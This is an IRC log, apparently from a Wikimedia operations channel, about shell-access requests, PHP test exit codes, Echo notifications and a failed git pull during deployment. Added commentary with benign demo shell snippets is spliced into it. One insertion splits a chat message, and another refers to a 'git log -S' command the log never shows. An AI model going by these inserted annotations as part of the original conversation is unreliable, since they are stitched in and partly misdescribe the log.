[19:42:51] am I supposed to handle every request there even if no request reason is filled in?
[19:42:58] yeah
[19:43:04] we add people unless we have a reason not to
[19:43:05] anomie: it was introduced by 3966df7fc83 of php-src, "Add support for Travis CI"
[19:43:11] it's mostly to avoid sockpuppets
[19:43:16] granted
[19:43:19] cool
[19:43:21] hashar- So what php version will include that?
[19:43:21] ok
[19:43:25] working :)
[19:43:42] anomie: let me update my branches. But I guess php 5.5
[19:43:51] git branch --contains 3966df7fc83093766e5e6862b18b8ef03ef58e09 --all
[19:43:53] petan: so, right now you also need to go edit the request page too
[19:43:58] to mark it as done
[19:43:58] anomie: master / PHP-5.5 :(
[19:44:04] ok
[19:44:06] I have a bug open to make that happen automatically
[19:44:24] anomie: ah no, that might be unrelated. Need to look again
[19:45:16] Ryan_Lane should I also send a message to these users that their request was completed?
[19:45:25] or something like that
[19:45:27] hashar- Until then, TEST_PHP_ARGS="-q --show-diff" make test && [ \! -e tests/*.log ] should work
[19:45:44] if I requested shell access I would hardly notice it from wiki logs
[19:45:59] petan: hm.
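The two git commands quoted above — `git log -S` to find the commit that introduced a string, and `git branch --contains` to see which branches carry it — can be demonstrated on a throwaway repository (the originals were run against php-src):

```shell
# Demo of `git log -S` (pickaxe) and `git branch --contains` on a scratch
# repo; the real investigation above was run against php-src.
set -e
repo=$(mktemp -d)
cd "$repo"
git init -q
git -c user.name=demo -c user.email=d@example.org commit -q --allow-empty -m 'initial'
# Introduce the string we will later search for
echo 'REPORT_EXIT_STATUS=1' > run-tests.env
git add run-tests.env
git -c user.name=demo -c user.email=d@example.org commit -q -m 'add REPORT_EXIT_STATUS'
# -S finds commits that changed the number of occurrences of the string
sha=$(git log -S REPORT_EXIT_STATUS --format=%H)
# --contains lists every branch that includes that commit
git branch --contains "$sha"
```

Against php-src, `--contains` answering only `master` and `PHP-5.5` is exactly how hashar concluded the fix would not reach 5.4.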
we haven't been
[19:46:19] petan: we should probably automatically add the page to the user's watchlist, if possible
[19:46:22] well, I am doing this on mediawiki for bureaucrat stuff, even cross-wiki
[19:46:27] then they'll get a notification when it's edited
[19:46:31] right
[19:46:36] well, actually, that won't help either
[19:46:39] if they watch the watchlist heh
[19:46:44] in the future the page doesn't need to be edited
[19:46:46] anomie: the run-tests.php script on gallium has support for REPORT_EXIT_STATUS :-]
[19:46:57] we could just create a template
[19:47:05] which could be substituted to the user talk page
[19:47:09] if (getenv('REPORT_EXIT_STATUS') == 1 and preg_match('/FAILED(?: |$)/', implode(' ', $test_results))) { exit(1); }
[19:47:10] hashar- The problem is that the makefile generated by phpize needs to forward the exit code
[19:47:26] anomie: I guess make will fail
[19:47:30] like {{subst:ShellGranted}}
[19:47:45] that could be automatic too
[19:47:59] for example twinkle does a similar thing
[19:48:43] anomie: a quick test and the make manual show that GNU make exits 2 whenever something failed
[19:49:25] hashar- How about if the line has a "-" at the beginning?
[19:49:38] Like the Makefile made by PHP does for that whole block
[19:50:23] anomie: the -@command ?
[19:52:24] hashar- Well, the "-" and "@" seem to be separate flags ("suppress errors" and "no echo"), but yes
[19:54:13] petan: we could add a hook that adds an echo notification
[19:54:26] so that when a user is added to shell, they get an echo notification
[19:55:36] this honestly may be nice to just have in core
[19:55:53] it's good to know when your groups have been modified
[19:56:03] let me add a bug for this
[19:57:10] I'm trying to deploy a core update to wmf11, but I get the following error:
[19:57:11] error: unable to unlink old 'RELEASE-NOTES-1.21' (Permission denied)
[19:57:45] Ryan_Lane hm what about this for now?
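The GNU make behavior discussed above can be checked with a tiny generated Makefile: a failing recipe command makes `make` exit with status 2, a leading `-` tells make to ignore that command's failure, and a leading `@` suppresses echoing the command. A small sketch:

```shell
# Demonstrate GNU make's "-" (ignore errors) and "@" (no echo) recipe
# prefixes, and its exit status of 2 when a recipe fails.
set -e
dir=$(mktemp -d)
# printf keeps the required TAB characters in the recipe lines explicit
printf 'strict:\n\tfalse\n\nlenient:\n\t-false\n\t@echo still ran\n' > "$dir/Makefile"
# A plain failing command: make reports an error and exits 2
if make -C "$dir" strict >/dev/null 2>&1; then strict_rc=0; else strict_rc=$?; fi
# With "-", the failure is ignored and the next recipe line still runs
make -C "$dir" lenient > "$dir/out.txt" 2>&1
```

This is why prefixing the whole test block with `-`, as PHP's generated Makefile does, swallows the failure instead of propagating it.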
https://wikitech.wikimedia.org/wiki/Template:ShellGranted
[19:57:56] that'll work for now
[19:58:07] * Ryan_Lane hates adding stuff to users' talk pages
[19:58:10] I tried it again and got the following errors:
[19:58:13] heh
[19:58:22] actually I like welcome messages on wikipedias
[19:58:28] they contain useful links
[19:58:29] :)
[19:58:32] error: Your local changes to the following files would be overwritten by merge
[19:58:40] kaldari: are you getting that on sync, or some other part of the process?
[19:58:43] and then it lists all the files from the update besides the release notes
[19:58:48] petan: echo also provides those links
[19:59:05] what's echo in mediawiki?
[19:59:05] guess I should try resetting and re-pulling
[19:59:05] kaldari: so, this is when doing a git pull
[19:59:10] yeah
[19:59:18] kaldari: is there anything unmerged?
[19:59:28] kaldari: resetting will wipe those changes out
[19:59:31] it's dangerous
[20:00:06] yeah, all the files that were updated by the half-finished pull (but nothing else as far as I can tell)
[20:00:09] petan: echo is the new notification system
[20:00:14] ah
[20:00:18] yes that would be better
[20:00:21] petan: it's installed on wikitech
[20:00:28] it's the number, with the dropdown
[20:00:37] I've seen it on mediawiki too
[20:00:42] I'll just reset those individual files
[20:00:49] kaldari: that's a better idea
[20:00:51] kaldari: use checkout
[20:00:54] not reset
[20:01:10] ok
[20:01:55] Speaking of Echo, is there already a bug for "the popup is not visible in monobook"?
[20:02:06] I'd like the css to work in all skins
[20:02:12] Ryan_Lane these non-existing users, were they test users or did something go wrong?
[20:02:15] it's also broken in the strapping skin
[20:02:15] like Arun289
[20:02:26] petan: I don't know
[20:02:36] ok
[20:02:39] petan: Maybe it's users that failed to add somehow?
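The checkout-not-reset advice above, sketched on a scratch repository: `git checkout -- <file>` restores just the named file from HEAD, while `git reset --hard` would discard every local change in the working tree.

```shell
# Restore a single clobbered file with `git checkout -- <file>`,
# as suggested above, instead of a destructive `git reset --hard`.
set -e
repo=$(mktemp -d)
cd "$repo"
git init -q
echo 'original contents' > RELEASE-NOTES-1.21
git add RELEASE-NOTES-1.21
git -c user.name=demo -c user.email=d@example.org commit -q -m 'initial'
# Simulate the working copy damaged by a half-finished pull
echo 'clobbered' > RELEASE-NOTES-1.21
# Restore only this file from HEAD; other local changes stay untouched
git checkout -- RELEASE-NOTES-1.21
```

On a shared deploy tree, limiting the restore to the files the broken pull actually touched is exactly why checkout is the safer choice here.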
[20:02:45] I really don't know how those are showing up
[20:03:15] Re-checked out all the files affected by the incomplete pull, tried the pull again, and got the same error on the release notes: unable to unlink old 'RELEASE-NOTES-1.21' (Permission denied)
[20:03:31] permission denied?
[20:03:38] that sounds like someone did a pull as root
[20:03:43] one second
[20:03:43] should I try sudo git pull?
[20:03:45] which directory is this?
[20:03:48] no. definitely not
[20:03:59] /home/wikipedia/common/php-1.21wmf11
[20:04:34] -rw-rw-r-- 1 reedy wikidev 19197 Mar 4 18:33 RELEASE-NOTES-1.21
[20:04:34] hm
[20:04:48] o_0
[20:05:22] we should put in hooks that disallow root from making git changes
[20:05:37] it's probably fucked up objects in the .git folder
[20:05:49] I guess this could also be a umask problem
[20:05:57] we should have similar hooks for that
[20:06:06] it's not files owned by root
[20:09:03] pizza time!
[20:13:12] Ryan_Lane, Reedy: Let me know when I should try again. Still have 45 mins left in my window.
[20:37:15] kaldari: I've just done a git pull and 2 submodule updates...
[20:37:24] you should at least be able to push your code out
[20:38:32] Reedy: thanks
[21:10:11] kaldari: looks like we're up on test, but we're getting the usual garbage where message caches aren't updating or what have you
[21:10:12] http://test.wikipedia.org/wiki/Special:GettingStarted
[21:11:02] StevenW: yeah, that's OK
[21:11:15] Yep, we usually just push to prod when I see that. :)
[23:14:05] new staffer ABaso(WMF)?
[23:14:12] yes
[23:14:14] Adam Baso
[23:14:16] k, thx
[23:14:40] saw nothing announced, not on list, and not created at m: by staff
[23:16:33] tarred and feathered
[23:31:33] about to run scap!
[23:34:26] Brace yourself!
[23:34:35] scap executed!
[23:45:07] All hands, brace for impact!
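One detail behind the confusion above: "unable to unlink" is usually a directory-permission problem, because deleting a file requires write and execute permission on its parent directory, not on the file itself — which is why the `-rw-rw-r--` listing of the file looks fine. A hypothetical helper (the `can_unlink` name is invented) to check for that condition:

```shell
# Hypothetical check for git's "unable to unlink old '<file>'" error:
# removing a file requires write+execute permission on the parent
# directory, so the file's own mode (like -rw-rw-r-- above) is irrelevant.
can_unlink() {
    dir=$(dirname "$1")
    [ -w "$dir" ] && [ -x "$dir" ]
}
```

Run it against the failing path, e.g. `can_unlink RELEASE-NOTES-1.21 || echo 'fix the directory perms'`. A stray root-owned object under `.git/` from a pull run as root, or a bad umask, produces the same symptom.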